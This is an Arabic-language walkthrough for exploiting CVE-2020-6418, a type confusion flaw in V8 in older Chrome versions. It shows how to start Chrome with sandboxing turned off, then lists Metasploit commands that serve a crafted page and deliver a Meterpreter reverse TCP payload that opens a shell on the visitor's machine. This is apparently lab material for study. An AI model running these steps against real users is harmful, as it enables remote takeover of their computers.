
تتعلق الثغرة CVE-2020-6418 بالخلط في النوع (type confusion) في V8 في متصفح Google Chrome. الإصدارات المتأثرة هي تلك التي تسبق الإصدار 80.0.3987.122. يتم تحقيق الثغرة عن طريق مهاجم عن بعد يصل إلى شل (shell) جهاز الهدف عبر صفحة HTML مصممة خصيصًا.
ملاحظة: يجب تشغيل متصفح Google Chrome بدون صندوق رمل (sandbox) لكي ينجح الاستغلال.
i) إنشاء اختصار لـ Google Chrome
ii) النقر على "خصائص" > الانتقال إلى خيار يسمى "الهدف" (Target)
iii) في نهاية المسار EXE، أضف مسافة ثم أدخل -no-sandbox
iv) انقر "تطبيق" > "موافق"
v) افتح متصفح Google Chrome الجديد وستظهر نافذة منبثقة بالنص التالي:
You are using an unsupported command-line flag: -no-sandbox. Stability and security will suffer
نظرًا لأننا نستخدم Kali كبيئة لتنفيذ الاستغلال، فإن metasploit يأتي كأداة مدمجة مع التوزيعة. ولكن إذا كنت تستخدم توزيعات أخرى، فسنحتاج إلى إعداد metasploit قبل بدء الاستغلال.
ارجع إلى تثبيت Metasploit لمزيد من الفهم.
i) بدء إطار عمل metasploit
> msfconsole
ii) البحث عن الاستغلال
> search chrome_js
iii) استخدام الاستغلال المتاح من الإخراج أعلاه
> use exploit/multi/browser/chrome_jscreate_sideeffect
iv) توفير عنوان IP لـ SRVHOST
> set SRVHOST <ip address>
v) توفير الهدف هنا نحصل على خيارين
> set Target " Number "
vi) توفير الحمولة (Payload)
> set PAYLOAD windows/x64/meterpreter/reverse_tcp
vii) للتحقق من الإعدادات والخيارات الحالية الممكنة
> show options
viii) لتشغيل الاستغلال
> run (or) > exploit
ix) سيتم تزويدك بعنوان URL، يجب نسخه في المتصفح لتفعيل الجلسة.
x) بمجرد وصول المستخدم إلى URL، سيتم إنشاء جلسة. للتحقق من ذلك:
> show sessions
xi) باستخدام الجلسة، يمكننا التحقق من معلومات نظام المستخدم / الدخول إلى الشل.
> sessions <number>
> shell